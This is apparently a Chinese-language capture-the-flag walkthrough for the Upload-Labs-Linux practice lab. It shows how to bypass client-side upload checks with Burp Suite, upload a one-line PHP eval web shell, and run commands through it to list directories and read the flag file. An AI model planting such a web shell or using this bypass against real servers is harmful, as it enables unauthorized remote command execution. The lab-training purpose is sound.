Upload-Labs-Linux

文件上传漏洞

这里上传文件我们可以打开检查，可以看到该页面对上传文件做了相关的限定，但是只是在前端页面进行了相关的验证，后端不知道，但是我们可以试试绕过前端的校验，可以在设置中禁用javascript，也可以进行burpsuite进行抓包

这里使用抓包，上传的文件木马为获取该服务器的cmd权限

这里的校验为前端，我们上传木马文件

<?php @eval($_GET['cmd']);?>木马文件需要后缀为jpg，这里使用burpsuite抓包后修改后缀后在发送

这里发送完成后就可以访问服务器了

检查一下是否拥有权限

核心代码

?cmd=phpinfo();

权限拥有，找到flag只需要查看该服务器的文件目录

核心代码

?cmd=system('ls /');

查看flag就好了

?cmd=system('cat /flag');